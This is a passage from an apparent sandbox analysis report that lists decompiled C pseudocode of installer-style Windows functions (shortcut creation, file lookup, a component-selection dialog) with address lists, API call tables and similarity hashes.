							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                  0x004021b3
                                                  0x004021bd
                                                  0x004021c7
                                                  0x004021d1
                                                  0x004021dc
                                                  0x004021df
                                                  0x004021f9
                                                  0x004021fc
                                                  0x00402202
                                                  0x00402205
                                                  0x0040220f
                                                  0x00402213
                                                  0x00402213
                                                  0x00402218
                                                  0x00402229
                                                  0x00402231
                                                  0x004022e8
                                                  0x004022e8
                                                  0x004022ef
                                                  0x00402237
                                                  0x00402237
                                                  0x00402246
                                                  0x0040224a
                                                  0x0040224d
                                                  0x00402253
                                                  0x00402261
                                                  0x00402264
                                                  0x00402266
                                                  0x00402271
                                                  0x00402271
                                                  0x00402276
                                                  0x00402278
                                                  0x0040227f
                                                  0x0040227f
                                                  0x00402282
                                                  0x0040228b
                                                  0x0040228e
                                                  0x00402294
                                                  0x00402296
                                                  0x004022a0
                                                  0x004022a0
                                                  0x004022a3
                                                  0x004022ac
                                                  0x004022af
                                                  0x004022b8
                                                  0x004022be
                                                  0x004022c0
                                                  0x004022ce
                                                  0x004022ce
                                                  0x004022d1
                                                  0x004022d7
                                                  0x004022d7
                                                  0x004022da
                                                  0x004022e0
                                                  0x004022e6
                                                  0x004022fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004022e6
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00402269
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 542301482-3107243751
                                                  • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                  • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                  • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                  • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                  0x00402923
                                                  0x0040293e
                                                  0x00402949
                                                  0x0040294a
                                                  0x00402a94
                                                  0x00402925
                                                  0x00402928
                                                  0x0040292b
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                  • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                  • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                  • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                  0x00405038
                                                  0x00405051
                                                  0x00405056
                                                  0x0040505e
                                                  0x00405064
                                                  0x0040507a
                                                  0x0040507d
                                                  0x004052a8
                                                  0x004052af
                                                  0x004052c3
                                                  0x004052b1
                                                  0x004052b3
                                                  0x004052b6
                                                  0x004052b7
                                                  0x004052be
                                                  0x004052be
                                                  0x004052cf
                                                  0x004052dd
                                                  0x004052e0
                                                  0x004052f6
                                                  0x0040536b
                                                  0x0040536e
                                                  0x00405370
                                                  0x0040537a
                                                  0x00405388
                                                  0x00405388
                                                  0x0040538a
                                                  0x00405394
                                                  0x0040539a
                                                  0x0040539d
                                                  0x004053a0
                                                  0x004053bb
                                                  0x004053a2
                                                  0x004053ac
                                                  0x004053ac
                                                  0x004053a0
                                                  0x00405394
                                                  0x00000000
                                                  0x0040536e
                                                  0x004052fb
                                                  0x00405306
                                                  0x0040530b
                                                  0x00405312
                                                  0x00405317
                                                  0x0040531b
                                                  0x00405326
                                                  0x00405326
                                                  0x0040532a
                                                  0x0040532e
                                                  0x00405332
                                                  0x00405345
                                                  0x00405334
                                                  0x00405334
                                                  0x0040533b
                                                  0x00405341
                                                  0x0040533d
                                                  0x0040533d
                                                  0x0040533d
                                                  0x0040533b
                                                  0x00405349
                                                  0x0040534b
                                                  0x0040535e
                                                  0x00405361
                                                  0x00405364
                                                  0x00405364
                                                  0x0040532e
                                                  0x00000000
                                                  0x0040531b
                                                  0x004052fd
                                                  0x00405304
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053be
                                                  0x004053be
                                                  0x004053c5
                                                  0x00405436
                                                  0x0040543e
                                                  0x00405446
                                                  0x00405446
                                                  0x0040544f
                                                  0x00405451
                                                  0x00405458
                                                  0x0040545b
                                                  0x0040545b
                                                  0x00405461
                                                  0x00405468
                                                  0x0040546b
                                                  0x0040546b
                                                  0x00405471
                                                  0x00405477
                                                  0x0040547d
                                                  0x0040547d
                                                  0x0040548a
                                                  0x004055eb
                                                  0x004055f2
                                                  0x0040560f
                                                  0x00405615
                                                  0x00405627
                                                  0x00405627
                                                  0x00000000
                                                  0x00405490
                                                  0x00405492
                                                  0x00405497
                                                  0x0040549c
                                                  0x004054a1
                                                  0x004054a3
                                                  0x004054a3
                                                  0x004054a4
                                                  0x004054a5
                                                  0x004054a7
                                                  0x004054a7
                                                  0x004054af
                                                  0x004054f0
                                                  0x004054f2
                                                  0x00405502
                                                  0x00405505
                                                  0x0040550a
                                                  0x00405511
                                                  0x00405514
                                                  0x004055b6
                                                  0x004055bf
                                                  0x004055c7
                                                  0x004055c7
                                                  0x004055d5
                                                  0x004055e6
                                                  0x004055e6
                                                  0x00000000
                                                  0x004055d5
                                                  0x0040551a
                                                  0x0040551d
                                                  0x00405523
                                                  0x00405528
                                                  0x0040552a
                                                  0x0040552c
                                                  0x00405532
                                                  0x00405539
                                                  0x0040553e
                                                  0x00405545
                                                  0x00405548
                                                  0x00405548
                                                  0x0040554f
                                                  0x0040555b
                                                  0x0040555f
                                                  0x00405561
                                                  0x00405561
                                                  0x00405551
                                                  0x00405553
                                                  0x00405553
                                                  0x00405581
                                                  0x0040558d
                                                  0x0040559c
                                                  0x0040559c
                                                  0x0040559e
                                                  0x004055a1
                                                  0x004055aa
                                                  0x00000000
                                                  0x004054b1
                                                  0x004054bc
                                                  0x004054bf
                                                  0x004054c4
                                                  0x004054c6
                                                  0x004054ca
                                                  0x004054da
                                                  0x004054e4
                                                  0x004054e6
                                                  0x004054e9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004054cc
                                                  0x004054cc
                                                  0x004054d2
                                                  0x004054d4
                                                  0x004054d4
                                                  0x004054d5
                                                  0x004054d6
                                                  0x00000000
                                                  0x004054cc
                                                  0x004054af
                                                  0x0040548a
                                                  0x004053cd
                                                  0x00000000
                                                  0x004053e3
                                                  0x004053ed
                                                  0x004053f2
                                                  0x00000000
                                                  0x00000000
                                                  0x00405404
                                                  0x00405409
                                                  0x00405415
                                                  0x00405415
                                                  0x00405417
                                                  0x00405426
                                                  0x00405428
                                                  0x0040542c
                                                  0x0040542f
                                                  0x00000000
                                                  0x0040542f
                                                  0x004053cd
                                                  0x00405083
                                                  0x00405088
                                                  0x00405091
                                                  0x00405098
                                                  0x004050aa
                                                  0x004050b5
                                                  0x004050bb
                                                  0x004050c9
                                                  0x004050dd
                                                  0x004050e2
                                                  0x004050ef
                                                  0x004050f4
                                                  0x0040510a
                                                  0x0040511b
                                                  0x00405128
                                                  0x00405128
                                                  0x0040512b
                                                  0x00405131
                                                  0x00405133
                                                  0x00405136
                                                  0x0040513b
                                                  0x00405140
                                                  0x00405142
                                                  0x00405142
                                                  0x00405162
                                                  0x00405162
                                                  0x00405164
                                                  0x00405165
                                                  0x0040516a
                                                  0x00405170
                                                  0x00405174
                                                  0x00405179
                                                  0x00405181
                                                  0x00405185
                                                  0x0040518a
                                                  0x0040518f
                                                  0x00405197
                                                  0x0040519a
                                                  0x0040526a
                                                  0x0040527d
                                                  0x00000000
                                                  0x004051a0
                                                  0x004051a3
                                                  0x004051a6
                                                  0x004051a9
                                                  0x004051a9
                                                  0x004051af
                                                  0x004051b8
                                                  0x004051bb
                                                  0x004051bf
                                                  0x004051c2
                                                  0x004051c5
                                                  0x004051ce
                                                  0x004051d7
                                                  0x004051da
                                                  0x004051dd
                                                  0x004051e0
                                                  0x0040521e
                                                  0x00405249
                                                  0x00405220
                                                  0x0040522f
                                                  0x0040522f
                                                  0x004051e2
                                                  0x004051e5
                                                  0x004051f3
                                                  0x004051fd
                                                  0x00405205
                                                  0x0040520c
                                                  0x00405217
                                                  0x00405217
                                                  0x004051e0
                                                  0x0040524f
                                                  0x00405250
                                                  0x0040525c
                                                  0x0040525c
                                                  0x00405268
                                                  0x00405283
                                                  0x00405286
                                                  0x004052a3
                                                  0x00000000
                                                  0x00405288
                                                  0x0040528d
                                                  0x00405296
                                                  0x00405629
                                                  0x0040563b
                                                  0x0040563b
                                                  0x00405286
                                                  0x00000000
                                                  0x00405268
                                                  0x0040519a

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405049
                                                  • GetDlgItem.USER32 ref: 00405054
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                  • LoadImageW.USER32 ref: 004050B5
                                                  • SetWindowLongW.USER32 ref: 004050CE
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                  • DeleteObject.GDI32(00000000), ref: 0040512B
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                  • SetWindowLongW.USER32 ref: 0040527D
                                                  • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                  • GlobalFree.KERNEL32 ref: 0040546B
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                  • ShowWindow.USER32(?,00000000), ref: 00405615
                                                  • GetDlgItem.USER32 ref: 00405620
                                                  • ShowWindow.USER32(00000000), ref: 00405627
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                  • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                  • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                  • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
